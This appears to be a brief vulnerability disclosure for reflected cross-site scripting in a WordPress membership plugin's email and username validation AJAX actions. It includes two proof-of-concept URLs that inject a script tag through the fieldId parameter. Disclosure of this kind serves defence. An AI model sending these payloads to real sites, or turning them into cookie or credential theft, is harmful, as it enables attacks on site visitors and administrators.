The plugin does not properly sanitise and escape parameters before outputting them back in AJAX actions, leading to Reflected Cross-Site Scripting
https://example.com/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
https://example.com/wp-admin/admin-ajax.php?action=swpm_validate_user_name&fieldId=%22%3Cscript%3Ealert(%22XSS%22);%3C/script%3E